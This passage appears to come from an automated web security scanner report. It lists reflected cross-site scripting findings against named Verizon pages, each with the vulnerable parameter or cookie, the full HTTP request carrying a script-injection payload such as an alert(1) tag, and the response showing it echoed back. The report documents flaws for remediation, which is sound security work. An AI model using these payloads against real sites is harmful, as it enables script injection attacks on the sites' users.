NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 269001
Expires: Sat, 20 Nov 2010 01:50:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:50:35 GMT
Connection: close

<headtags><script language='javascript'>var GlobalHeaderId='GlobalHeader';</script>
<script>var masterClientID ='GlobalHeader';</script>
<script language='javascript' src='/content/commonfiles/include
...[SNIP]...
<input type='hidden' id='hdn_appdet' value='help-net2f16d'><script>alert(1)</script>9530f6d8cb8' />
...[SNIP]...

1.23. https://www22.verizon.com/ForYourHome/FTTPRepair/vziha/ihamain.aspx [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForYourHome/FTTPRepair/vziha/ihamain.aspx

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ab2c"><script>alert(1)</script>e6e204819f4 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForYourHome/FTTPRepair/vziha/ihamain.aspx?keyword=WebVoiceMail1ab2c"><script>alert(1)</script>e6e204819f4 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2407
Expires: Sat, 20 Nov 2010 01:44:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:44:51 GMT
Connection: close

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>VZ In Home Agent</title>
<link rel="stylesheet" href="./hnm/css/isupport.css" type="text/css" />
<link rel="stylesheet" h
...[SNIP]...
<input type="hidden" name="my1stKeyWord" id="my1stKeyWord" value="WebVoiceMail1ab2c"><script>alert(1)</script>e6e204819f4"/>
...[SNIP]...

1.24. https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx [Client parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx

Issue detail

The value of the Client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c31b8"%3balert(1)//8bc1e1ef23e was submitted in the Client parameter. This input was echoed as c31b8";alert(1)//8bc1e1ef23e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?Client=VZSAc31b8"%3balert(1)//8bc1e1ef23e&FLOWROUTE=VZSA-NFVDO HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 22645
Expires: Sat, 20 Nov 2010 01:45:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:45:13 GMT
Connection: close
Set-Cookie: EOrdering=PN-DR-ENABLED=iVwfNps%2fXq8%3d&PROJNORTH-CLIENT=&WR58038_DC=efZHv8OIFvI%3d&VZDOTNET=Z%2bMP4OJFy582MDcMZSELXA%3d%3d&HBXSOURCE=Z%2bMP4OJFy582MDcMZSELXA%3d%3d; domain=.verizon.com; path=/

<script language="javascript">    vzLogging_appName = "eOrdering";</script>

<script language="javascript" src="../Common/includes/js/pagetracker.js"></script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD
...[SNIP]...


               locationHref = locationHref + "&Client=" + "VZSAc31b8";alert(1)//8bc1e1ef23e"


           location.href = locationHref + catHref;
           var appname = navigator.appName;
           if(appname != "Netscape")
           {

            var tempHTML = document.getElementById(Ctrl1).innerHTML;

...[SNIP]...

1.25. https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx [FLOWROUTE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx

Issue detail

The value of the FLOWROUTE request parameter is copied into a JavaScript rest-of-line comment. The payload 80f17%0aalert(1)//3a3631dfb05 was submitted in the FLOWROUTE parameter. This input was echoed as 80f17
alert(1)//3a3631dfb05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?Client=VZSA&FLOWROUTE=VZSA-NFVDO80f17%0aalert(1)//3a3631dfb05 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 22668
Expires: Sat, 20 Nov 2010 01:45:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:45:19 GMT
Connection: close
Set-Cookie: EOrdering=PN-DR-ENABLED=iVwfNps%2fXq8%3d&PROJNORTH-CLIENT=&WR58038_DC=efZHv8OIFvI%3d&HBXSOURCE=%2fhVcACS2B8Xn295HYL3i%2fTN0dmEOUd9D; domain=.verizon.com; path=/

<script language="javascript"> vzLogging_appName = "eOrdering";</script>

<script language="javascript" src="../Common/includes/js/pagetracker.js"></script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD
...[SNIP]...
//End

//Changes made for Project North - if condition added
if ( PostDataToDifferentDataCenter != "Y" )
{

//FlowRoute = "VZSA-NFVDO80f17
alert(1)//3a3631dfb05";
FlowRoute = ("VZSA-NFVDO80f17
alert(1)//3a3631dfb05");

locationHref ="RegistrationBridgeProcess.aspx?txtAppId=" + "" + "&from=" + "" + "&FlowRoute="
...[SNIP]...

1.26. http://www22.verizon.com/Content/CommonTemplates/Templates/Broadband/Broadband.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/CommonTemplates/Templates/Broadband/Broadband.aspx

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e339d'><script>alert(1)</script>9f0d250bbd7 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/CommonTemplates/Templates/Broadband/Broadband.aspx?NRMODE=Published&NRNODEGUID=%7b6D1C874F-8C8F-4D12-833A-F5C0A068D90E%7d&NRORIGINALURL=%2fResidential%2fInternet%2f&NRCACHEHINT=ModifyGuest HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXe339d'><script>alert(1)</script>9f0d250bbd7; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71537
Expires: Sat, 20 Nov 2010 01:54:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:54:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXe339d'><script>alert(1)</script>9f0d250bbd7; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXE339D'><SCRIPT>ALERT(1)</SCRIPT>9F0D250BBD7 ' />
...[SNIP]...

1.27. http://www22.verizon.com/Content/CommonTemplates/Templates/Broadband/Broadband.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/CommonTemplates/Templates/Broadband/Broadband.aspx

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 9be7b<script>alert(1)</script>12f3c52f942 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/CommonTemplates/Templates/Broadband/Broadband.aspx?NRMODE=Published&NRNODEGUID=%7b6D1C874F-8C8F-4D12-833A-F5C0A068D90E%7d&NRORIGINALURL=%2fResidential%2fInternet%2f&NRCACHEHINT=ModifyGuest HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX9be7b<script>alert(1)</script>12f3c52f942; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73117
Expires: Sat, 20 Nov 2010 01:54:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:54:17 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX9be7b<script>alert(1)</script>12f3c52f942; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX9BE7B<SCRIPT>ALERT(1)</SCRIPT>12F3C52F942 </DIV>
...[SNIP]...

1.28. http://www22.verizon.com/Content/CommonTemplates/Templates/TV/Landing.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/CommonTemplates/Templates/TV/Landing.aspx

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7285'><script>alert(1)</script>2d8fbfba90c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/CommonTemplates/Templates/TV/Landing.aspx?NRMODE=Published&NRNODEGUID=%7bA18C63F0-45CE-49DB-AEF0-997D0095D373%7d&NRORIGINALURL=%2fResidential%2fTV%2f&NRCACHEHINT=ModifyGuest HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXd7285'><script>alert(1)</script>2d8fbfba90c; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76231
Expires: Sat, 20 Nov 2010 01:54:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:54:00 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXd7285'><script>alert(1)</script>2d8fbfba90c; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXD7285'><SCRIPT>ALERT(1)</SCRIPT>2D8FBFBA90C ' />
...[SNIP]...

1.29. http://www22.verizon.com/Content/CommonTemplates/Templates/TV/Landing.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/CommonTemplates/Templates/TV/Landing.aspx

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload fa483<script>alert(1)</script>d0e6edf1fd8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/CommonTemplates/Templates/TV/Landing.aspx?NRMODE=Published&NRNODEGUID=%7bA18C63F0-45CE-49DB-AEF0-997D0095D373%7d&NRORIGINALURL=%2fResidential%2fTV%2f&NRCACHEHINT=ModifyGuest HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXfa483<script>alert(1)</script>d0e6edf1fd8; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74642
Expires: Sat, 20 Nov 2010 01:54:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:54:01 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXfa483<script>alert(1)</script>d0e6edf1fd8; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXFA483<SCRIPT>ALERT(1)</SCRIPT>D0E6EDF1FD8 </DIV>
...[SNIP]...

1.30. http://www22.verizon.com/Content/ExecutiveCenter/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/ExecutiveCenter/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 26cea<script>alert(1)</script>f7f842ffe2e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/ExecutiveCenter/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX26cea<script>alert(1)</script>f7f842ffe2e; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 141433
Expires: Sat, 20 Nov 2010 01:56:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:56:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:56:12 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:56:12 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:56:12 GMT; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | Leadership Team - Overview
</title><link rel="stylesheet" type="text/css" href="/Content/Microsites/Includes/CSS/executi
...[SNIP]...
<SPAN id=ghziploc>TX26CEA<SCRIPT>ALERT(1)</SCRIPT>F7F842FFE2E </SPAN>
...[SNIP]...

1.31. http://www22.verizon.com/Content/ExecutiveCenter/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/ExecutiveCenter/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 71be6'><script>alert(1)</script>1284a5ad464 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Content/ExecutiveCenter/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
